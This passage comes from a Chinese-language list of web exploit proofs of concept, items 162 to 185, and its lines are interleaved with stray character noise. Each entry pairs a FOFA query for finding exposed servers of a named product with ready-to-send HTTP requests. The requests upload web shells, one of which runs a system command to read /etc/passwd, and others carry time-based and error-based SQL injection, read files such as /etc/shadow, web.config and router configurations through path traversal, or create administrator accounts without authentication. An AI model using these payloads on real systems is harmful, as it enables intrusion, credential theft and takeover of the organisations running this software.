<ip>1</ip>! _3 r0 Y: g, V
<fileName>../../../../dizxdell.aspx</fileName>
% s% X6 q4 W5 A<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
O) t" U1 a( V$ ?4 `8 ?3 g9 N: _/ D<tag>3</tag>4 B9 O6 Z$ P; ^. X5 }" d
</UploadResume>
# e/ A: D' [! X' @</soap:Body>
O8 v+ P# }$ C1 A8 B</soap:Envelope>: `: ~0 g$ F- @7 a. l
9 U& d* o; t5 I* w$ Q7 P
+ V2 v+ T3 a5 V# L4 E. hhttp://x.x.x.x/dizxdell.aspx
" C! U" v& S( K# m% o0 V! Q# U: Z, G7 A& `5 m' t# [$ E. B
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
1 V4 n$ K9 u, D6 c2 H& mFOFA: app="和丰山海-数字标牌"
2 T! r0 j& X. A2 P8 e) aPOST /QH.aspx HTTP/1.1
1 S F' H1 E! ]- H5 R' e. a/ bHost: x.x.x.x
2 R* E& L4 ]$ g) Q h1 A' U1 qUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0- q1 r9 O7 v7 |
Connection: close4 a% Z/ ?! \2 N/ J$ ? D
Content-Length: 583
0 i3 i' }& G3 O- {1 vContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey' c9 v5 j3 Q/ j
Accept-Encoding: gzip
: ]/ f) M0 ^7 W, k
: C- O) Z1 a+ l0 e& v1 T5 u q6 t------WebKitFormBoundaryeegvclmyurlotuey& b$ \& P7 y0 w) N2 R: @
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"3 q' X9 a% m# h& Q' d0 `
Content-Type: application/octet-stream
( Q/ f0 U$ d9 {0 t; i& j2 I5 K4 X" D9 C" T. i
<% response.write("ujidwqfuuqjalgkvrpqy") %> _1 w6 M. Q( V* M. O
------WebKitFormBoundaryeegvclmyurlotuey
3 I% u7 {) w; m5 T+ OContent-Disposition: form-data; name="action"
; _1 p) N8 j# z( O" K- j9 g r8 n
2 z' t, U( v4 S) h% t# `8 Vupload) D/ ]. k% n$ O
------WebKitFormBoundaryeegvclmyurlotuey
0 `" }* C, T2 v- o2 K: bContent-Disposition: form-data; name="responderId"
5 z' p/ C3 N8 N: Q5 D6 n5 k
. ~! m! g% G6 r" O* F6 Z, T9 @ResourceNewResponder
% S( D) D, U2 \7 l; m) G------WebKitFormBoundaryeegvclmyurlotuey9 [+ o# R) Y1 l0 v
Content-Disposition: form-data; name="remotePath"% b& o' U/ s1 F7 |. Y; _+ I
5 ~3 ?$ w' C; L' X* {* f. S5 h3 n/opt/resources2 _" J$ a0 D9 V: q
------WebKitFormBoundaryeegvclmyurlotuey--7 }: M! j* _1 N
8 n# j; K- m% P0 a: W6 }
' N( A4 ~# _: Q. p8 v; d( ~http://x.x.x.x/opt/resources/kjuhitjgk.aspx
" ~' ~- }7 m: ? g; [; G5 a2 p( ~9 |) X% v
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
' H+ l Z. |9 U6 S* VFOFA: icon_hash="-795291075"
5 v1 J" k* x2 u3 Q& EPOST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
+ J( Z a X& S O8 rHost: x.x.x.x
, h& {+ u w) z1 g; V2 s% UUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
+ s4 R! U5 j# nConnection: close2 z( N' X* y8 A( C* C
Content-Length: 293
( d0 L; a& K3 `1 W; WAccept: */*
1 Q( j7 g/ _0 V. c. {' h5 q8 ^& sAccept-Encoding: gzip, deflate
$ ^5 ^% ]/ F5 I; p- H1 fAccept-Language: zh-CN,zh;q=0.9
! p, I1 c7 c( w# a' E8 A* U5 yContent-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod" j b3 |4 u3 [: v1 {
( v1 E; k, ]/ ^+ z8 v
------iiqvnofupvhdyrcoqyuujyetjvqgocod* O+ x9 ?, t. I3 l' c5 g
Content-Disposition: form-data; name="name"
1 W7 X h- W9 ^1 l6 c. E% i+ P7 ~& \& N
1.php7 p$ G7 b0 N8 C# G6 a6 U8 U
------iiqvnofupvhdyrcoqyuujyetjvqgocod& b2 J9 T" O% R9 D `
Content-Disposition: form-data; name="upfile"; filename="1.php"0 |* I- _- v/ d/ }1 U
Content-Type: image/jpeg, O* l* D+ a( e6 a$ [9 o: Q0 z! ?
- i+ g" ]: o w0 O5 M
rvjhvbhwwuooyiioxega
6 x" t( x3 A, k) r2 R# a' c7 _2 {------iiqvnofupvhdyrcoqyuujyetjvqgocod--9 P) @' M$ L. }: i: J0 K
/ T1 Q+ q' Y. C: E) Q
& T; L# O) ]: h W; V6 {: ]+ h164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
( Z Q' T% L' ?FOFA: title="智慧综合管理平台登入"6 {/ J; J' T) F
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.12 ]/ Z( N+ `/ b; g
Host: x.x.x.x
5 w$ e9 v' I$ QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
) O& _: [1 d3 S( \7 U' RContent-Length: 288
) V+ p7 d& h# Y6 h$ ]Accept: application/json, text/javascript, */*; q=0.01
0 V z" v) M# I9 H% k% D# UAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,
9 b% R0 X1 {: Z) g$ r4 u+ |$ yConnection: close
% I2 G0 g8 U4 I& X; o/ Q0 H5 v `5 eContent-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl5 P/ j( E' t! M& X) k+ j- x1 p! ^
X-Requested-With: XMLHttpRequest
% Y6 C! d6 h; T. i' G) sAccept-Encoding: gzip
x3 b3 Y: L1 d2 A& I# j2 D1 ~- }5 W5 \+ y6 }/ ]
------dqdaieopnozbkapjacdbdthlvtlyl
/ y& Y# P" r! Y; P" y$ Q) ZContent-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
: |& c" h: l0 |Content-Type: image/jpeg4 r2 S' _% E. F9 i0 A3 i @: k
. @6 }# f, J8 ?1 V0 p
<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>- @% t: p) J, N! o1 x
------dqdaieopnozbkapjacdbdthlvtlyl--) h: d( D2 v5 [# \) c) \/ u- c( H
& _$ k8 m/ G( s6 t7 o
& G0 i3 B, Q$ fhttp://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx! W$ ]3 M7 j% Y
# ]4 \: i8 o+ U" z9 t+ d- j
165. OrangeHRM 3.3.3 SQL 注入 s1 e( I7 `: N& a( t/ T. f
CVE-2024-364286 C2 r- C0 C6 W( Q$ d
FOFA: app="OrangeHRM-产品"
+ g+ X q; @- o% D6 k* bURL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))% Y6 E" X+ r2 g# G7 b8 d4 I$ N
; I1 B! W# x d& O4 ]: h; h
6 W% i8 [; L8 e, V166. 中成科信票务管理平台SeatMapHandler SQL注入- k) N; N1 |6 Y3 l
FOFA:body="技术支持:北京中成科信科技发展有限公司"
- C; ?) q3 u" NPOST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1' m( T, [) o/ b! [
Host:
A! u$ J* m$ H( YPragma: no-cache6 W* n2 z; w" ]+ I) Q0 S0 u5 s# v
Cache-Control: no-cache
8 g( {; V$ S4 [) ~) IUpgrade-Insecure-Requests: 1, ?: \& b" \) ?$ v. f
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.363 m$ t' r4 _) ]% g) O; o* s
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
) o! z7 ]. q' dAccept-Encoding: gzip, deflate
$ h7 H+ t& E+ x6 S- c5 w- `1 y) YAccept-Language: zh-CN,zh;q=0.9,en;q=0.89 x2 K% i, C! o' N `2 M
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
0 |- j& {+ ]! A6 N3 m6 yConnection: close7 E, S$ b! u" y" y
Content-Type: application/x-www-form-urlencoded: z. b1 G" h. D2 I, b" L* s
Content-Length: 89# g- P; T: U& B5 m4 o) w
: o U& J! t( {% MMethod=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE6 q8 o2 [# i$ _* O E# n
" V. U7 o% n7 ~1 _, j1 B* }# Y0 Y
2 H. g N$ e# \# G167. 精益价值管理系统 DownLoad.aspx任意文件读取
# l, o& }) |# S- q* D* uFOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
) {, ]' ?/ Z0 m6 n9 A/ x/ t7 @GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.12 b9 S! }& e4 h$ Z
Host:; J0 f# \) k) l* S& L: S
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
) a' _* g: Z6 I' G) zContent-Type: application/x-www-form-urlencoded K) ^1 S) L+ R, p6 ^2 M/ _
Accept-Encoding: gzip, deflate
/ s, [3 j3 [3 j+ I+ W( g9 W2 RAccept: */*1 \6 s" q: u9 c$ x2 ]" h4 |
Connection: keep-alive4 v. u% j1 Q1 n& `& t; ^2 |
) i6 I/ j9 h3 y4 m$ S1 M6 C
/ y, Z' T9 B6 G+ j$ O1 N: V9 I168. 宏景EHR OutputCode 任意文件读取
+ G, ~0 W4 [: o' T5 C g5 nFOFA:app="HJSOFT-HCM"
7 `1 d: ]+ i, T: BGET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1* ^8 u5 J8 D3 J6 D
Host: your-ip5 l, X2 ?, [5 i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36: e e8 ]$ h/ o t
Content-Type: application/x-www-form-urlencoded
/ |* Z& M1 H- rConnection: close
5 D; T2 _( D* t8 O9 _& W7 B; N1 p8 j$ x4 D% b
' J5 ?1 {6 G& \: i$ A% J; D* F2 t" f. Z; Z" p( h$ Q
169. 宏景EHR downlawbase SQL注入' d3 \. |8 z+ E% }) H9 m9 C) s
FOFA:app="HJSOFT-HCM"$ R% q& h/ f1 n; D+ b
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1& d0 c' K+ y! p F
Host: your-ip
7 o; ^0 d. B" g8 TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36$ a6 J! _* \1 ~' d( e
Accept: */*
& K, a0 W$ {: c' KAccept-Encoding: gzip, deflate
& c; B% Q1 x7 M9 b; Y& |; G& T" BConnection: close
$ o8 L+ Y3 h! w. j' h( f8 ?, D+ ]$ g/ i! i' X# ?# j
, [9 W1 E3 C: M" H9 {( A k4 ~
; u3 g, N: K5 J+ S$ L/ H170. 宏景EHR DisplayExcelCustomReport 任意文件读取8 l/ H* ?) _0 A- r. Q$ @
FOFA:body="/general/sys/hjaxmanage.js"! c9 X) e4 S7 N6 P) s
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1- M( I4 M1 _9 a% t$ L1 D
Host: balalanengliang
9 s1 l- a& ]( F/ C6 {User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
* h. O: W) Y2 \% WContent-Type: application/x-www-form-urlencoded
0 r9 X! S5 ~) h+ o, k X7 j
6 a9 v2 W p4 T3 h9 }filename=../webapps/ROOT/WEB-INF/web.xml
1 v) H3 p5 z7 m" }
& \; o$ X9 [- Y( d7 ?, W
# I( B3 z6 [) U$ }171. 通天星CMSV6车载定位监控平台 SQL注入' w* {( |9 t7 B& t+ t
FOFA:body="/808gps/", @! R3 K _2 y( n
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1$ |( v* Q$ s# Y# H8 ^$ R3 {$ l; A
Host: your-ip2 }; _# n( z0 d6 [: _! }7 |' Q# c7 {
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
8 [% j0 _$ ?% |" l; X1 M3 lAccept: */*0 n# [9 k$ r: y1 C8 \* V6 @
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.25 S2 ]- c* {2 b J$ x# @( o
Accept-Encoding: gzip, deflate
* h6 d3 J2 E+ ^$ J$ e% Q( D8 jConnection: close, H+ U8 ]1 @. f `6 p& M
. c; t+ [* ~+ h; w8 k" k" Y* ^# Z. V5 {- }$ E% u
1 ?8 I( ~' F4 H+ F; `$ }2 p172. DT-高清车牌识别摄像机任意文件读取
" c! s& v" k0 J$ x$ gFOFA:app="DT-高清车牌识别摄像机"
4 W" r6 u2 {4 c- m9 [5 Q9 m& jGET /../../../../etc/passwd HTTP/1.1
- \/ I$ I. y2 A! c$ Z! X- ]Host: your-ip
}, n6 ]4 n4 ?, H& _' l7 HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
3 M% Q. I6 j3 Y. MAccept-Encoding: gzip, deflate1 @" [/ ~5 Y) K2 Q" V$ o" G2 Y" t
Accept: */*$ J. L& W9 f: K+ Y$ P, t
Connection: keep-alive
, v" _! Z# Z; I! E6 D8 E8 o
; X Y2 o* `- ?9 G2 ]. m
2 a$ R. j4 B) W" ?
) `7 K2 T! K* G" f# Z+ |, T p173. Check Point 安全网关任意文件读取5 E' S, ^/ X6 K) A. h$ y% `3 ?( E3 d+ e
CVE-2024-24919
& h. }9 c& d/ O0 yFOFA:app="Check_Point-SSL-Network-Extender"
+ P0 t6 G/ Z- ]: Z5 S' k& V4 lPOST /clients/MyCRL HTTP/1.1
0 X r2 [1 D: `$ F9 `Host: your-ip
, z5 ~/ n% p2 t& l0 \Content-Type: application/x-www-form-urlencoded+ t- |1 g* S8 G4 [
, @5 E% X1 R/ I! N! M& vaCSHELL/../../../../../../../etc/shadow4 U* {0 F1 u: V% Q
8 i5 s# U/ L" ~1 c& X' K- q4 w$ x4 ?/ r9 H; w& }+ q
/ Q1 H @2 {8 X( D$ {, v174. 金和OA C6 FileDownLoad.aspx 任意文件读取
& U( [5 _* k# U8 F5 Q( N- WFOFA:app="金和网络-金和OA"
' {) R1 s) v6 l- w" u, ?! PGET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1& S9 l8 C2 _2 B5 D) q
Host: your-ip% [2 X/ j$ D9 i, j) f( ?1 u8 l
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.366 o6 p1 n3 {9 V9 a
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.79 i; P5 b0 R* O( N. X' x! B
Accept-Encoding: gzip, deflate, br
$ w R% r6 ^2 d0 `$ p2 {Accept-Language: zh-CN,zh;q=0.9
& B' b: ^. U6 k. vConnection: close# P; a/ u+ `. R8 p. c# Y' s, P
% o* @9 l6 K3 \" P# b; x
& A) o) Y# |, Q
+ N0 `$ O# [& g9 j' A+ a175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入4 N" r/ c) k* K: ^' s+ A" q$ `
FOFA:app="金和网络-金和OA"- c k* a8 T' l4 m! U% c
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
1 D' _( E6 _3 a# n# ^5 @Host:9 Q) [6 ^( x) F; v
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
$ I9 T* G. f1 C5 ?Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.85 V( z, r0 M6 T1 e
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
5 }* H: a; r$ U& G9 F2 JAccept-Encoding: gzip, deflate: o$ A& Q7 j) a! a7 j
Connection: close
, {+ H9 s; }: n+ aUpgrade-Insecure-Requests: 1 J' z: c/ w( R6 x, u+ t$ H! e7 R
$ Y& O4 [( b' U2 k9 l2 w' v
: V" o9 S8 b" Q+ T* [176. 电信网关配置管理系统 rewrite.php 文件上传- ~# L4 a$ }- A
FOFA:body="img/login_bg3.png" && body="系统登录"; m9 z+ K+ P* a* W8 `3 w6 N
POST /manager/teletext/material/rewrite.php HTTP/1.1
4 Q, N& {! K! h4 P# F1 }" a' bHost: your-ip) c( z; t* J: U9 k$ C+ |4 @
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0, V! Z [& n+ J/ G5 F% m
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
: P- x G4 H1 O! ?" Y' l4 f: h2 }' t8 I: gConnection: close! R, m l8 s! @3 u% p* u' F
$ Q5 m! G: a: S0 I9 C------WebKitFormBoundaryOKldnDPT: B ~& ?# u% v8 P* e O
Content-Disposition: form-data; name="tmp_name"; filename="test.php"+ y- K4 ?0 }. \3 }. P$ Z0 Z
Content-Type: image/png8 S0 q/ a5 z% t8 `, k7 @
2 ]9 X4 B6 `& B9 v<?php system("cat /etc/passwd");unlink(__FILE__);?>
2 y: Y; a8 n- n. i------WebKitFormBoundaryOKldnDPT( g4 I7 D5 J7 I7 t* u+ A
Content-Disposition: form-data; name="uploadtime"# b2 e8 u! c: w1 o( o
' | j- B m3 R& E$ K$ j
8 z& [& C, `0 X------WebKitFormBoundaryOKldnDPT--
`8 I4 T" m: V J" ]8 g: d
/ J- n: W( n3 H x( d, l. ~# i5 ?0 r5 ^& t
0 Q e3 T/ K/ T, x( k
177. H3C路由器敏感信息泄露8 g% O- W, u1 Y" Z
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
; u. M+ Y! [3 g; T0 Z/userLogin.asp/../actionpolicy_status/../M60.cfg
$ U& ~3 K( f, M4 P3 @( r4 @; P/userLogin.asp/../actionpolicy_status/../GR8300.cfg
! B8 j1 ]; D" e$ Y( L9 `/userLogin.asp/../actionpolicy_status/../GR5200.cfg7 ~' M1 X, j( V, V6 C5 @' ~: [
/userLogin.asp/../actionpolicy_status/../GR3200.cfg' W4 {3 ^ g$ P* t. f/ q
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
3 ^8 j: Z$ y3 {1 }2 h& J- G& K r/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg" H$ t2 [- ^2 F/ Z" d8 \ Z
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
- |5 ^7 W; v% F) H. ~/ d/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg$ n* p1 P* k- ~7 Q; O3 \
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg; G' H. g; @. j4 D9 A
/userLogin.asp/../actionpolicy_status/../ER5200.cfg% p+ Y9 E6 x) T, j0 K
/userLogin.asp/../actionpolicy_status/../ER5100.cfg* N# h! S! p: i' q# f: D/ s- W8 W% V
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg( X% M. B, p: K
/userLogin.asp/../actionpolicy_status/../ER3260.cfg6 y( V* G5 m( h" v( q5 h# L
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
: R. |5 @6 E- f+ l' G8 A' t. I- D/userLogin.asp/../actionpolicy_status/../ER3200.cfg
' ^8 E$ j& T9 }( w U3 z! y+ u/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg7 [7 R6 n2 S) w' _
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg% P/ O- u; L( {6 M6 [$ K
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg9 K' `0 e6 W% }: a8 u$ W6 M
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/ P1 N6 O7 q# [- R/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg
$ ~, l) F1 B- ?& o, E. @
8 C- u8 y! ^5 r0 w. s2 }7 O& L V+ w- T t) h
178. H3C校园网自助服务系统-flexfileupload-任意文件上传9 e. a2 \ {# v8 C* B/ A1 K
FOFA:header="/selfservice"
: e8 k& P0 ]( r# y1 c) lPOST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
5 M3 b$ [ o m, {+ X. `6 m6 NHost:4 j2 b& }+ j1 ]" j
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
( B3 k. d3 M$ y* |Content-Length: 252: C, u8 X5 U w. Z
Accept-Encoding: gzip, deflate
! k9 k4 n2 B4 n* iConnection: close
5 k* R' v: u* D5 nContent-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l* f. t' @) \2 }; f+ r! p
-----------------aqutkea7vvanpqy3rh2l
' t. m/ G) ]+ ]* C- r% ]0 q }Content-Disposition: form-data; name="12234.txt"; filename="12234"! q- {* H$ w$ O) |( ]) E3 g
Content-Type: application/octet-stream! T+ `0 e- F( _: l9 F- j8 ^* ~
Content-Length: 255
; t( `4 r: a# ?0 T6 S' i" h
3 u; N( p5 l2 ^0 {6 u12234
! }/ c$ r7 B; R$ d# X5 ~: r2 x-----------------aqutkea7vvanpqy3rh2l--, h, T" f8 b* r: x/ a2 n
9 {# h4 f* F: c; N- p& {
" N: ^+ M. X6 \+ X5 z' n9 rGET /imc/primepush/%2e%2e/flex/12234.txt) U) S+ I( Q' A" c
$ t5 y# w' @/ P- r: L
2 c4 r( {$ _7 n, |& f0 ?4 a179. 建文工程管理系统存在任意文件读取
1 h! P) Z e, |& xPOST /Common/DownLoad2.aspx HTTP/1.1* s$ a2 u3 g; p |, x: b
Host: {{Hostname}}9 A, G8 V" i$ B$ s& v" f2 A
Content-Type: application/x-www-form-urlencoded
- \+ B2 R- l* Y. M8 K% `User-Agent: Mozilla/5.0
& A# z! C* [& D$ B8 {( v( S' ^( `& {1 a! U6 I2 _
path=../log4net.config&Name=
R/ o' {+ ~# C9 }' E
5 n J' }# x8 p3 `9 M/ R" h9 g. F" a6 I \: l
180. 帮管客 CRM jiliyu SQL注入
# T4 O9 z5 ~3 L" y9 U, i: N4 JFOFA:app="帮管客-CRM"
- O& K5 K9 r a6 V; W5 [GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.12 \9 d" H7 L: C4 e
Host: your-ip
$ ~% A3 {! i" A; G5 OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
5 S! D4 {& i; N1 @6 q+ k1 E& qAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7* X; ~- I7 r, q- g9 D/ p9 B* N4 U
Accept-Encoding: gzip, deflate2 i0 D ^8 E b, k! Y# e) ?4 o
Accept-Language: zh-CN,zh;q=0.9
, s3 p' r) D4 ]8 h* Q, ]0 aConnection: close
: N% P% k: S0 }9 e$ R
7 u* z( v0 |7 I3 C3 l; G; D
- O0 R6 Y: b) L181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
6 R- r1 \" g( @5 j; N# }0 VFOFA:"PDCA/js/_publicCom.js"
0 T9 m8 D Y) ?6 JPOST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
& N V+ R" g9 u1 L: }Host: your-ip0 b# ?& j' G1 Q8 s9 D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36# }" S; M( A7 o
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
! n) n: [8 ^2 @/ u) PAccept-Encoding: gzip, deflate, br
3 Y3 i2 H* p9 S9 yAccept-Language: zh-CN,zh;q=0.9 y* u( `: Z7 E% M
Connection: close% e6 i$ _2 A) V( {, o& Y1 V: M
Content-Type: application/x-www-form-urlencoded9 Y. O5 [6 _- ?4 n9 \
x* S' d. e, q3 O V; G
% ^" F7 E* m5 J' c& O: }action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20
0 H' D3 S# [/ o) B0 v
6 h3 I3 t, _* X; u' z9 b; r1 ?
. o1 {* r: Y9 I' |182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
5 w" c2 m0 i% r2 zFOFA:"PDCA/js/_publicCom.js"* C- d% b- v$ W+ Q' E5 {
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
) n% }8 R D: S' A) Q, eHost: your-ip6 t+ p* X9 l+ l" {
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36) Y. z$ ?2 a0 Q2 d0 T7 C& _
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.70 \. g$ w# i% {% f. a2 Q, P
Accept-Encoding: gzip, deflate, br
7 ^( C& _/ @/ u4 p6 t& yAccept-Language: zh-CN,zh;q=0.9
" h" P, z! f% o! |& G3 K, nConnection: close
: V4 G+ y, f1 M, B! u. ~- i3 AContent-Type: application/x-www-form-urlencoded
* [1 R# u8 V; N- Y4 Y& O* O' w+ }* X& `" T& @1 s
2 d( t' d2 w" l8 ?: \username=test1234&pwd=test1234&savedays=1/ \3 A, E( T5 W% f+ Y/ V
8 v! x) \7 u4 O, C& k7 w K7 d2 _3 ^. w% |" h1 g
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入! i0 P) x9 m m7 [
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"/ m2 A' d9 P- ~% I$ R# f6 x. @
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
; n8 E, r2 z! Q; I3 r; x; X: s1 NHost: your-ip* V+ t3 y/ e: t3 k8 {1 ^
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36% r( x# m4 Y- m4 N; ]: L8 d0 N3 V5 u
Accept-Charset: utf-8) [; u2 S) C' p+ l6 y- N
Accept-Encoding: gzip, deflate7 S( O( [1 T+ ]
Connection: close
! J: I3 }$ I8 }
5 j; c2 O2 n2 `6 M8 @/ n* F3 W2 i7 i9 \! z/ F' e
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
/ L' z) f9 K& h4 P9 ?$ T: `) MFOFA:server="SunFull-Webs"
/ C$ G- ~: u. mPOST /soap/AddUser HTTP/1.15 q" j" y1 x4 t, J9 n
Host: your-ip; Q# S( Q: U, R( W
Accept-Encoding: gzip, deflate1 o2 ~; P+ y, N( U0 L
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.08 t* d' k8 @# G8 F t
Accept: application/xml, text/xml, */*; q=0.01
2 ^/ Z& J* r$ J/ |Content-Type: text/xml; charset=utf-80 U- n, r, J5 _! z# }
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2: _/ m% H6 H1 F
X-Requested-With: XMLHttpRequest9 k' t+ g7 {& S; o+ s# l) E! U' R
1 B' ]. |9 C: I4 U6 _6 x
0 N. I" [) x0 rinsert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')4 U. n) ]) D9 V/ a9 R9 \1 l
* a( P0 o" x0 h: [2 f$ P- `# }
9 {; n6 u% ~- L; i+ u
185. 瑞友天翼应用虚拟化系统SQL注入- t S. k" b' |; O
version < 7.0.5.1$ r) `: Y! q5 _2 c3 J+ e& b
